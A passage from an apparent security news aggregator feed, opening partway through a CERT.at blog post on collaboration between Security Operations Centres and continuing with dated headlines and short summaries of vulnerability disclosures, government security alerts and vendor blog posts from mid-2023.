mutually beneficial. Vendor/customer mix can kill networks If two members of a network are actually in a vendor/customer relationship in terms of cyber security, then this is a strong detriment to collaboration. Even just a potential sale is tricky: if one member is describing his problem, then someone else should not be in the position to offer his own commercial product of service to address that problem. I have seen this work only if the representative of the vendor can clearly differentiate between his role as network partner and his pre-sales job. This is the exception, not the rule. Competition (1) Ideally, the member of the network should be in no competition to one another. Example: the security team of Vienna’s city hospitals and the equivalent team of the Berlin Charité are a best case: their hosting organisations are working in the same sector, but there is absolutely no competition for customers between those two. If the hosting organisations are actually competing with each other (see the VW vs. Renault example from above, or different banks), then a cooperation on IT security is not a given. Nevertheless, it is also not impossible, as competitors are often collaborating with respect to lobbying, standardization or interconnection. One positive example I have seen are the Austrian banks, who are cooperating about e-banking security based on the premise that the customers will not differentiate between “e-banking at Bank X is insecure” and “e-banking is insecure”. Competition (2) Even trickier is the case of SOCs not just protecting the infrastructure of their respective hosting organisation, but also offering their services on a commercial basis to any customer (“SOC outsourcing”). Anything one SOC shares with the network then potentially helps a direct competitor. Example: both Deloitte and Cap Gemini offer SOC outsourcing and Threat Intel reporting. Their knowledge base is their competitive advantage and why should they share this freely with a competitor when they are selling the same information to a customer? Such constellations are extremely difficult, but not impossible to manage. The trick to deal with competition in such networks is to move the collaboration to a purely operational / technical layer. These people are used to deal with their peers in a productive way. Alignment of interest This all boils down to Is it a good commercial decision for my SOC to participate in the network? Is it a good commercial decision to share data into the network? Resources All members must make the clear management decision to participate in such network and must allocate human power to it. In some way, such networks operate a bit like amateur sport clubs or open-source projects: they thrive based on the voluntary work done by their members. I have seen too many cases where such networks fail simply because members lost interest and did not invest time and effort in running them effectively. Running a network Secretariat While not strictly necessary, a paid back-office increases the chances of success significantly. Someone has to organize meetings, write minutes, keeps tracks on memberships, produces reports, and provides an external point of contact. Doing this on a voluntary basis might work for very small and static networks, where a round-robin chair role can succeed. Connecting people Bringing people together is the basis foundation of a collaboration network. Only in the case where the network is only the distribution of information from a handful of central sources to all members (i.e., a one-way information flow), then this might not be needed. This can be done by (in order of importance) Physical meetings (conferences, workshops, …) Continuous low-friction instant messaging Mailing-lists Web-Forums Generic central tooling Any network, regardless of topic, needs a few central tooling components: A directory of members (preferably with self-service editing) A file repository An administrative mailing-list A topical mailing-list An instant messaging facility A decent Identity and Access management covering all these tools is recommended (but not strictly necessary in the first iteration). The toolset created for the CSIRTs Network (MeliCERTes 2) can help here. Exchange of Information In the end, the main motivation of such network is information sharing with the intention of making members more effective in their core task. Here are some thoughts on that aspect: Compatible levels of Maturity If members are at very different levels of technological and organisational maturity, then any information exchange is of limited value. A common baseline is helpful. Human to Human This is the easiest information exchange to get going, and some topics really need to be covered on the human layer: people can talk about experiences, about cases, about what works and what does not. It is also possible to exchange Cyber Threat Intelligence (CTI) between humans: the typical write-up of a detected APT campaign, including all the Indicators (IoCs) found during the incident response, is exactly that. This sounds easy, but is costly in terms of human time. On the receiving side, the SOC needs to operationalize the information contained to make the automated systems detect a similar campaign in the local constituency. Information Management The way a SOC is gathering, storing, correlating and de-duplicating the CTI that is powering its detection capability is a core element in the SOC internal workflow. Its maturity in this respect drives the possibilities of collaboration on the topic of CTI. One (not uncontroversial) theory on this topic is the “Pyramid of Pain” concept from David Bianco, where he describes the levels of abstractions in CTI. The lower levels are easy for SIEMs to detect, but also trivial for the threat actor to change. The challenge for SOCs is to operate at a higher level than what the threat actors is prepared to change frequently. CTI M2M In theory, SOCs should be able to cross-connect their CTI systems to profit from each other’s learnings and thus increase the overall detection capability of SOC Network. Regrettably, this is non-trivial on multiple fronts: Data protection / customer privacy They must be ensure that no information about the customer where the CTI was found during IR, leaks out. Sometimes this is easy and trivial sometimes it is not. Thus, unless the SOC is very mature at entering CTI into their system, people will want to check manually what is being shared. Data licencing Many SOCs buy CTI data from commercial sources. Such data needs to be excluded from automatic data sharing. Data compatibility While there are a number of standards for CTI data exchange (e.g., STIXX/TAXII, MISP or Sigma rules), this is far from being a settled topic. Especially if you want to move up in the pyramid of pain. Sharing tools In addition to sharing information, it is also possible that members of the network share the tools they have written to perform various aspects of a SOCs job.

https://www.cert.at/en/blog/2023/7/a-network-of-socs
Conquering Adversarial Bots and Humans to Prevent Account Takeovers
2023-07-07T13:00:00Z | 1688734800

https://www.akamai.com/blog/security/conquering-adversarial-bots-and-humans
Differential fuzz testing upgradeable smart contracts with Diffusc
2023-07-07T11:00:33Z | 1688727633

On March 28, 2023, SafeMoon, a self-styled “community-focused DeFi token” on Binance Smart Chain, lost the equivalent of $8.9 million in Binance Coin BNB to an exploit in a liquidity pool. The exploit leveraged a simple error introduced in an upgrade to SafeMoon’s SFM token contract, allowing the attacker to burn tokens held in the […]

https://blog.trailofbits.com/2023/07/07/differential-fuzz-testing-upgradeable-smart-contracts-with-diffusc/
CVE-2023-27334
2023-07-07T10:55:00Z | 1688727300

CWE-400 Uncontrolled Resource Consumption: If many method call requests are send with an array of methods to execute, the server may crash unexpectedly and must be restarted.

https://claroty.com/team82/disclosure-dashboard/cve-2023-27334
CVE-2023-29378
2023-07-07T10:53:00Z | 1688727180

CWE-23: Relative Path Traversal: The OPC UA FileDirectory and File object implementation does not check for relative path traversal. In combination with CVE-2023-29377 the server gives read and write access to local files which could be used for remote code excecution.

https://claroty.com/team82/disclosure-dashboard/cve-2023-29378
CVE-2023-29377
2023-07-07T10:50:00Z | 1688727000

CWE-22: Path Traversal: The OPC UA file object implementation allows to bypass the separation between OPC UA namespaces, limitations on assignment of directory path to FileDirectory OPC UA objects and limitations on assignment of the file path to File OPC UA objects. In combination with CVE-2023-29378 the server gives read and write access to local files which could be used for remote code excecution.

https://claroty.com/team82/disclosure-dashboard/cve-2023-29377
Pariisis tehakse algust Euroopa digikukru teenuste väljatöötamisega
2023-07-07T07:21:52Z | 1688714512

10. ja 11. juulil kogunevad Pariisis Euroopa Liidu 19 liikmesriigi ja 148 asutuse/ettevõtte esindajad, et anda avalöök Euroopa Liidu ülese digiidentiteedirakenduse (EUDI Wallet) ehk digikukru tulevaste teenuste pilootprojektidele.

https://ria.ee/uudised/pariisis-tehakse-algust-euroopa-digikukru-teenuste-valjatootamisega
Security Alert (A23-07-03): Vulnerability in VMware SD-WAN Edge
2023-07-07T04:00:00Z | 1688702400

VMware has published a security advisory to address a vulnerability in VMware SD-WAN Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-07-04): Vulnerability in Linux Operating Systems
2023-07-07T04:00:00Z | 1688702400

A local privilege escalation vulnerability is found in the Linux kernel 6.1 through 6.4.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-07-05): Multiple Vulnerabilities in Android
2023-07-07T04:00:00Z | 1688702400

Google has released Android Security Bulletin July 2023 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Juuni küberruumis: ohtrad õngitsused ja arvepettused
2023-07-06T07:07:29Z | 1688627249

RIA intsidentide lahendamise osakond (CERT-EE) registreeris juunis 243 mõjuga intsidenti, mis on viimase poole aasta keskmine näitaja. Ka möödunud kuul tuvastasid RIA eksperdid kõige enam õngitsuslehtedega seotud juhtumeid.

https://ria.ee/uudised/juuni-kuberruumis-ohtrad-ongitsused-ja-arvepettused
Security Alert (A23-07-02) Multiple Vulnerabilities in Cisco Products
2023-07-06T04:00:00Z | 1688616000

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Milesight UR32L vtysh_ubus tcpdump_start_cb OS command injection vulnerability
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1714
Milesight UR32L ys_thirdparty system_user_script OS command injection vulnerability
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1713
Milesight UR32L urvpn_client cmd_name_action OS command injection vulnerabilities
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1710
Milesight UR32L libzebra.so change_hostname OS command injection vulnerability
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1699
Milesight UR32L libzebra.so bridge_group OS command injection vulnerability
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1698
Milesight UR32L uhttpd login buffer overflow vulnerability
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1697
Milesight UR32L vtysh_ubus toolsh_excute.constprop.1 OS command injection vulnerabilities
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1706
Milesight MilesightVPN requestHandlers.js detail_device cross-site scripting (XSS) vulnerabilities
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1704
Milesight UR32L vtysh_ubus sprintf pattern buffer overflow vulnerabilities
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1716
Milesight UR32L zebra vlan_name OS command injection vulnerabilities
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1723
Milesight UR32L ys_thirdparty check_system_user OS command injection vulnerability
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1711
Milesight UR32L ys_thirdparty user_delete OS command injection vulnerability
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1694
Milesight UR32L urvpn_client http_connection_readcb stack-based buffer overflow vulnerability
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1718
Milesight MilesightVPN liburvpn.so create_private_key OS command injection vulnerability
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1703
Milesight MilesightVPN requestHandlers.js verifyToken authentication bypass vulnerability
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1700
Milesight MilesightVPN requestHandlers.js LoginAuth SQL injection vulnerability
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1701
Milesight UR32L libzebra.so security_decrypt_password buffer overflow vulnerability
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1715
Milesight UR32L vtysh_ubus _get_fw_logs OS command injection vulnerability
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1712
Milesight UR32L luci2-io file-export mib directory traversal vulnerability
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1695
Milesight UR32L eventcore access violation vulnerability
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1696
Milesight UR32L urvpn_client Certificate Validation vulnerability
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1705
Milesight MilesightVPN server.js start directory traversal vulnerability
2023-07-06T00:00:00Z | 1688601600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1702
Lost in Transition: A Timeline of Failed Successors to Breach and Raid Forums
2023-07-05T21:15:59Z | 1688591759

The legacy of Raid, Breach, and their 'successors' provides an important lens into how data breach communities function and the real-life implications of the information they traffic The post Lost in Transition: A Timeline of Failed Successors to Breach and Raid Forums appeared first on Flashpoint.

https://flashpoint.io/blog/breach-raid-forums-legacy/
Support from British businesses crucial in removing over 235,000 scams, new figures reveal
2023-07-05T19:25:28Z | 1688585128

The sixth annual report from Active Cyber Defence (ACD) highlights success of a “whole-of-society" approach in preventing millions of cyber attacks from reaching UK organisations and citizens each year.

https://www.ncsc.gov.uk/news/british-business-support-crucial-in-removing-scams
Multicloud Strategies Must Evolve to Meet the Needs of Global IT Leaders
2023-07-05T13:00:00Z | 1688562000

In a Forrester study commissioned by Akamai, global IT leaders explain why they are adopting cloud-native architecture and distributing apps and workloads.

https://www.akamai.com/blog/cloud/multicloud-strategies-must-evolve
Security Alert (A23-07-01): Multiple Vulnerabilities in Firefox
2023-07-05T04:00:00Z | 1688529600

Mozilla has published the advisories (MFSA2023-22 and MFSA2023-23) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Diagon Sequence::DrawText heap-based buffer overflow vulnerability
2023-07-05T00:00:00Z | 1688515200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1744
Diagon GraphPlanar::Write improper array index validation vulnerability
2023-07-05T00:00:00Z | 1688515200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1745
Cato SASE Cloud Identified as a “Leader”: Download the Report
2023-07-04T12:27:56Z | 1688473676

The post Cato SASE Cloud Identified as a “Leader”: Download the Report   appeared first on Cato Networks.

https://www.catonetworks.com/resources/cato-sase-cloud-identified-as-a-leader-download-the-report/
The National Cyber Security Centre Finland’s weekly review – 26/2023
2023-07-04T11:15:04Z | 1688469304

CEO fraud attempts are especially prevalent during the summer. The numbers of Microsoft 365 account compromises have also been high in recent months. In response, we have prepared new instructions to make it easier for you to protect your account.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-262023
The National Cyber Security Centre Finland’s weekly review – 26/2023
2023-07-04T11:15:04Z | 1688469304

CEO fraud attempts are especially prevalent during the summer. The numbers of Microsoft 365 account compromises have also been high in recent months. In response, we have prepared new instructions to make it easier for you to protect your account.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-262023
Cato’s 5 Gbps SASE Speed Record is Good News for Multicloud and Hybrid Cloud Deployments
2023-07-04T10:32:30Z | 1688466750

In the original Top Gun movie, Tom Cruise famously declared the words, “I feel the need! The need for speed!”. At Cato Networks, we also feel the need for speed, and while we’re not breaking the sound barrier at 30,000 feet, we did just break the SASE speed barrier (again!). (We’re also getting our taste... The post Cato’s 5 Gbps SASE Speed Record is Good News for Multicloud and Hybrid Cloud Deployments appeared first on Cato Networks.

https://www.catonetworks.com/blog/catos-5-gbps-sase-speed-record-is-good-news-for-multicloud-and-hybrid-cloud-deployments/
Why Open Enrollment Readiness Should Be a Year-Round Strategy
2023-07-03T13:00:00Z | 1688389200

Today?s malicious actors see the healthcare industry as a target-rich environment, so getting ready for open enrollment should be a year-round process.

https://www.akamai.com/blog/security/why-open-enrollment-readiness-should-be-year-round-strategy
RIA kutsub inimesi üles oma IT-vaatlikkust testima
2023-07-03T07:54:20Z | 1688370860

Riigi Infosüsteemi Amet (RIA) pöörab juulis aset leidva küberteadlikkuse tõstmise kampaaniaga tähelepanu ohtudele, mis Eesti inimesi küberruumis varitsevad ning mille tõttu meie ettevõtted ja inimesed võivad jäävad ilma olulistest andmetest, kontodest ja rahast.

https://ria.ee/uudised/ria-kutsub-inimesi-ules-oma-it-vaatlikkust-testima
SASE and CASB Functions: A Dynamic Duo for Cloud Security
2023-07-03T07:34:19Z | 1688369659

Cloud adoption has exploded in recent years. Nearly all companies are using cloud solutions, and the vast majority having deployments spanning the platforms of multiple cloud service providers. These complex cloud infrastructures can create significant usability and security challenges for an organization. If security settings are misconfigured, an organization’s cloud infrastructure, services and applications could... The post SASE and CASB Functions: A Dynamic Duo for Cloud Security appeared first on Cato Networks.

https://www.catonetworks.com/blog/sase-and-casb-functions-for-cloud-security/
Everything You Wanted To Know About AI Security But Were Afraid To Ask
2023-07-03T07:12:43Z | 1688368363

The post Everything You Wanted To Know About AI Security But Were Afraid To Ask appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-everything-you-wanted-to-know-about-ai-security
As Phishing Websites Flourish, Brands Seek Protection from Impersonation
2023-06-30T13:00:00Z | 1688130000

https://www.akamai.com/blog/security/brands-seek-protection-from-impersonation
Who’s Listening? Securing Ports Within Your Network
2023-06-30T13:00:00Z | 1688130000

Your house has several entrances— windows, doors, garage, maybe even your roof. These openings to your home are used for different purposes. Your door is used for foot traffic, the garage for cars, and windows for contractors or burglars. Whatever the specific case, we expect certain types of activity with each entrance.

https://www.ironnet.com/blog/investigating-undocumented-netcomms-from-legitimate-chrome-extension-0
Security Alert (A23-06-22): Multiple Vulnerabilities in Microsoft Edge
2023-06-30T04:00:00Z | 1688097600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
M3AAWG 58 Meeting in Dublin, June 2023
2023-06-30T00:01:00Z | 1688083260

Sadly, this year I wasn't able to join everyone at the Annual FIRST Conference in Montreal. By all accounts it was a brilliant time and I'm genuinely jealous of everyone who got to be there - especially the DNS Abuse SIG members who got to meet up in person.

https://www.first.org/blog/20230630-M3AAWG-58-Meeting-Dublin
3 Ways for Financial Institutions to Fight Account Takeover Fraud
2023-06-29T13:00:00Z | 1688043600

https://www.akamai.com/blog/security/ways-financial-institutions-can-fight-account-takeover-fraud
CVE-2023-32227
2023-06-29T10:48:00Z | 1688035680

CWE-798: Use of Hardcoded Credentials: The product contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data.

https://claroty.com/team82/disclosure-dashboard/cve-2023-32227
MITRE ATT&CK and How to Apply It to Your Organization
2023-06-29T10:43:11Z | 1688035391

MITRE ATT&CK is a popular knowledge base that categorizes the Tactics, Techniques and Procedures (TTPs) used by adversaries in cyberattacks. Created by nonprofit organization MITRE, MITRE ATT&CK equips security professionals with valuable insights to comprehend, detect, and counter cyber threats. In this blog post, we dive into the framework, explore different use cases for using... The post MITRE ATT&CK and How to Apply It to Your Organization appeared first on Cato Networks.

https://www.catonetworks.com/blog/mitre-attck-and-how-to-apply-it-to-your-organization/
CVE-2023-37213
2023-06-29T10:40:00Z | 1688035200

CWE-78: OS Command Injection: The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

https://claroty.com/team82/disclosure-dashboard/cve-2023-37213
Novo Fascículo da Cartilha de Segurança para Internet
2023-06-29T10:00:00Z | 1688032800

Lançado novo material da Cartilha de Segurança para Internet: Fascículo Trabalho Remoto https://cartilha.cert.br/fasciculos/#trabalho-remoto

https://cartilha.cert.br/
Proxyjacking: The Latest Cybercriminal Side Hustle
2023-06-29T07:30:00Z | 1688023800

https://www.akamai.com/blog/security-research/proxyjacking-new-campaign-cybercriminal-side-hustle
Days of Chaos: How OSINT Helps Us Understand the Putin-Prigozhin Schism
2023-06-28T20:09:49Z | 1687982989

Social media and messaging platforms like Telegram continue to play a key role in understanding events, rumors, and ideas as they unfold in the Russia-Ukraine war The post Days of Chaos: How OSINT Helps Us Understand the Putin-Prigozhin Schism appeared first on Flashpoint.

https://flashpoint.io/blog/putin-prigozhin-osint/
The L in Linux Stands for Lateral Movement
2023-06-28T14:00:00Z | 1687960800

https://www.akamai.com/blog/security-research/linux-lateral-movement-more-than-ssh
Lessons From Clop: Combating Ransomware and Cyber Extortion Events
2023-06-27T18:39:01Z | 1687891141

Recent attacks from Clop emphasize the importance of implementing an organization-wide ransomware and cyber extortion strategy, from preparedness to detection and isolation The post Lessons From Clop: Combating Ransomware and Cyber Extortion Events appeared first on Flashpoint.

https://flashpoint.io/blog/lessons-from-clop-ransomware-cyber-extortion-attacks/
Inclusion in Tech: Discover Diverse Career Paths for Women in Tech
2023-06-27T13:00:00Z | 1687870800

Hema Patel discusses inclusive career paths, cancel culture in the workplace, and defying the traditional education limitations for women in tech.

https://www.akamai.com/blog/culture/inclusion-in-tech-discover-diverse-career-paths
Enhancing Security and Asset Management with AI/ML in Cato Networks’ SASE Product
2023-06-27T12:00:00Z | 1687867200

We just introduced what we believe is a unique application of real-time, deep learning (DL) algorithms to network prevention. The announcement is hardly our foray into artificial intelligence (AI) and machine learning (ML). The technologies have long played a pivotal role in augmenting Cato’s SASE security and networking capabilities, enabling advanced threat prevention and efficient... The post Enhancing Security and Asset Management with AI/ML in Cato Networks’ SASE Product appeared first on Cato Networks.

https://www.catonetworks.com/blog/enhancing-security-and-asset-management-with-ai-ml-in-cato-sase-product/
The National Cyber Security Centre Finland’s weekly review – 25/2023
2023-06-27T09:52:46Z | 1687859566

Phishing and scam messages are constantly evolving. According to our estimate, approximately one hundred Finnish organisations have had their email accounts compromised in the last few months as a result. This week we also remind our readers of the importance of updating network devices.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-252023
The National Cyber Security Centre Finland’s weekly review – 25/2023
2023-06-27T09:52:46Z | 1687859566

Phishing and scam messages are constantly evolving. According to our estimate, approximately one hundred Finnish organisations have had their email accounts compromised in the last few months as a result. This week we also remind our readers of the importance of updating network devices.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-252023
NCSC-FI authorised as a CVE Numbering Authority
2023-06-27T09:46:51Z | 1687859211

The NCSC-FI has been authorised as a CVE Numbering Authority (CNA), which means that we can now assign CVE (Common Vulnerabilities and Exposures) IDs.

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fi-authorised-cve-numbering-authority
NCSC-FI authorised as a CVE Numbering Authority
2023-06-27T09:46:51Z | 1687859211

The NCSC-FI has been authorised as a CVE Numbering Authority (CNA), which means that we can now assign CVE (Common Vulnerabilities and Exposures) IDs.

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fi-authorised-cve-numbering-authority
Increased vigilance required to defend against phishing and scam messages
2023-06-27T09:42:55Z | 1687858975

Phishing and scam messages are constantly evolving, with criminals utilising various technologies, such as machine learning and artificial intelligence, as well as psychological methods to win their victims’ trust. And no wonder, as phishing campaigns are lucrative for criminals. According to the NCSC-FI’s estimate, approximately one hundred Finnish organisations have had their email accounts compromised in the last few months as a result.

https://www.kyberturvallisuuskeskus.fi/en/news/increased-vigilance-required-defend-against-phishing-and-scam-messages
Increased vigilance required to defend against phishing and scam messages
2023-06-27T09:42:55Z | 1687858975

Phishing and scam messages are constantly evolving, with criminals utilising various technologies, such as machine learning and artificial intelligence, as well as psychological methods to win their victims’ trust. And no wonder, as phishing campaigns are lucrative for criminals. According to the NCSC-FI’s estimate, approximately one hundred Finnish organisations have had their email accounts compromised in the last few months as a result.

https://www.kyberturvallisuuskeskus.fi/en/news/increased-vigilance-required-defend-against-phishing-and-scam-messages
Lightning caused by social media account breaches in May's cyber weather
2023-06-27T07:33:40Z | 1687851220

In May, cyber weather saw rainy skies due to scam calls and several vulnerabilities. A considerable increase in report volumes on social media account breaches also caused stormy weather.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_05/2023
Lightning caused by social media account breaches in May's cyber weather
2023-06-27T07:33:40Z | 1687851220

In May, cyber weather saw rainy skies due to scam calls and several vulnerabilities. A considerable increase in report volumes on social media account breaches also caused stormy weather.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_05/2023
Security Alert (A23-06-21) Multiple Vulnerabilities in Google Chrome
2023-06-27T04:00:00Z | 1687838400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A23-06-20): Multiple Vulnerabilities in Fortinet FortiNAC
2023-06-26T04:00:00Z | 1687752000

Fortinet released security advisories to address multiple vulnerabilities in Fortinet FortiNAC.

https://www.govcert.gov.hk/en/alerts_detail.php
Google Chrome WebGL rx::Image11::disassociateStorage use-after-free vulnerability
2023-06-26T00:00:00Z | 1687737600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1724
High Threat Security Alert (A23-06-16): Multiple Vulnerabilities in Apple iOS and iPadOS
2023-06-23T04:00:00Z | 1687492800

Apple has released iOS 15.7.7, iOS 16.5.1, iPadOS 15.7.7 and iPadOS 16.5.1 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-06-17): Vulnerability in Apache Tomcat
2023-06-23T04:00:00Z | 1687492800

The Apache Software Foundation released a security update to address a vulnerability in the Apache Tomcat.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-06-18): Multiple Vulnerabilities in Cisco Products
2023-06-23T04:00:00Z | 1687492800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-06-19): Vulnerabilities in VMware Products
2023-06-23T04:00:00Z | 1687492800

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Foi publicada a edição de 2023 do Relatório Riscos & Conflitos
2023-06-23T00:00:00Z | 1687478400

Na sua quarta edição, o Relatório Riscos & Conflitos 2023, do Observatório de Cibersegurança do CNCS, examina os principais dados relativos às ameaças que afetaram o ciberespaço de interesse nacional em 2022, identificando ainda tendências para 2023 e 2024. Este documento conta com a colaboração de diversas entidades que recolhem indicadores e desenvolvem análises sobre estas matérias em Portugal, tendo como objetivo informar as partes interessadas, suportar análises de risco e antecipar ameaças de modo a mitigar os seus efeitos no ciberespaço. Destacam-se de seguida as principais conclusões deste documento: “Os números de incidentes de cibersegurança e de cibercrimes a afetar o ciberespaço de interesse nacional continuaram a aumentar em 2022, verificando-se, em particular, um crescimento significativo de incidentes com elevado potencial disruptivo e de crimes tipificados na Lei do Cibercrime (crimes informáticos).” “As ciberameaças a afetar o ciberespaço de interesse nacional em 2022 de modo mais relevante foram o ransomware, a cibersabotagem/indisponibilidade, o phishing/smishing/vishing, a burla online, outras formas de engenharia social e o comprometimento de contas/tentativa de login.” “Em termos de casos com elevado impacto em Portugal, durante o primeiro trimestre de 2022 ocorreu um conjunto de ações maliciosas com efeitos muito disruptivos. O ano foi marcado por ataques de ransomware, redundando, por vezes, em divulgação de dados.” “Os agentes de ameaça a atuar no ciberespaço de interesse nacional em 2022 com mais relevância foram os cibercriminosos, os atores estatais e os hacktivistas.” “As vítimas de incidentes de cibersegurança mais relevantes em Portugal durante 2022 foram os setores da Banca (sobretudo clientes), da Educação e Ciência, Tecnologia e Ensino Superior, dos Transportes, da Saúde, bem como da Comunicação Social. No âmbito dos subsetores da Administração Pública, destaca-se, comparativamente, a Administração Pública Local como alvo com maior número de incidências. Por sua vez, alguns organismos públicos em particular sofreram ciberataques com significado.” “A perceção de risco de alguma entidade no ciberespaço de interesse nacional poder sofrer um incidente de cibersegurança aumentou em 2022 e 2023.” “As principais tendências nacionais, no que se refere ao quadro de ameaças no ciberespaço, são a crescente ‘profissionalização’ do cibercrime, a incerteza resultante da guerra na Ucrânia e algumas ciberameaças específicas, tais como o ransomware, o DDoS, o malware de furto de credenciais e os smishing/ vishing/spoofing oportunistas relativamente ao uso massificado do telemóvel.” “Como cenário persistente, mantêm-se as ameaças típicas do contexto geopolítico e estratégico atual, devido ao prolongamento da guerra na Ucrânia, o que provoca o acentuar de antagonismos que encontram formas de polarização em ações de atores estatais e hacktivistas que pretendem ganhos informacionais ou propagandísticos para o seu lado do conflito. Enquanto a guerra na Ucrânia não terminar, prevê-se que este cenário se mantenha e possa mesmo agudizar-se.” “Ainda numa fase emergente, e com resultado incerto quanto à transformação que efetivamente poderá trazer, devem considerar-se as ameaças que têm vindo a surgir em resultado da disponibilização de plataformas de Inteligência Artificial para o público em geral e o seu potencial de utilização para o desenvolvimento de ferramentas úteis na realização de ações maliciosas no ciberespaço. Esta disponibilização tem-se mostrado apta a apresentar soluções técnicas para a efetividade de ciberataques, mas também para a criação de campanhas de desinformação.” Consulte o documento completo aqui. Aceda à versão de leitura rápida aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135783/foi-publicada-a-edicao-de-2023-do-relatorio-riscos-conflitos
Cato Networks Recognized as Global SSE Product Leader
2023-06-22T15:05:59Z | 1687446359

The post Cato Networks Recognized as Global SSE Product Leader appeared first on Cato Networks.

https://go.catonetworks.com/Frost-Sullivan-Award-Cato-SSE360_LP.html
Navigating a New Reality: Content Personalization at Scale
2023-06-22T13:00:00Z | 1687438800

Prioritizing content personalization can improve user engagement, enhance customer experiences, and boost revenue on a global scale.

https://www.akamai.com/blog/edge/navigating-new-reality-content-personalization-at-scale
How Security Teams can Leverage MITRE ATT&CK and How Cato Networks’ SASE can Help
2023-06-22T09:15:03Z | 1687425303

In a recent poll we conducted, two thirds of respondents shared they were unaware of the MITRE ATT&CK Framework or were only beginning to understand what it can provide. When used correctly, MITRE ATT&CK can significantly help organizations bolster their security posture. In this blog post, we explain how security teams can leverage MITRE ATT&CK... The post How Security Teams can Leverage MITRE ATT&CK and How Cato Networks’ SASE can Help appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-use-mitre-framework-to-protect-your-organization/
OWASP Top 10 API Security Risks: The 2023 Edition Is Finally Here
2023-06-21T13:00:00Z | 1687352400

We review the final changes in the 2023 update to the OWASP Top 10 API Security Risks to help you on your journey to secure your APIs.

https://www.akamai.com/blog/security/owasp-top-10-api-security-risks-2023-edition
Vestlusrobot Bürokratt on nüüd Riigipilvest tellitav
2023-06-21T11:43:33Z | 1687347813

Avaliku sektori asutuste veebilehtedele mõeldud Bürokrati juturoboti leiab alates juunist Riigipilve teenuste kataloogist.

https://ria.ee/uudised/vestlusrobot-burokratt-nuud-riigipilvest-tellitav
Akamai SIRT Security Advisory: CVE-2023-26801 Exploited to Spread Mirai Botnet Malware
2023-06-21T10:00:00Z | 1687341600

https://www.akamai.com/blog/security-research/cve-2023-26801-exploited-spreading-mirai-botnet
Akamai Named a Leader in IDC MarketScape for Network Edge Security as a Service
2023-06-21T09:00:00Z | 1687338000

Akamai was named a Leader in the IDC MarketScape for delivering cloud security without performance trade-offs via our mature application security portfolio.

https://www.akamai.com/blog/security/akamai-named-leader-idc-marketscape-network-edge-security-service
RIA avaldas uuendatud krüptoalgoritmide uuringu
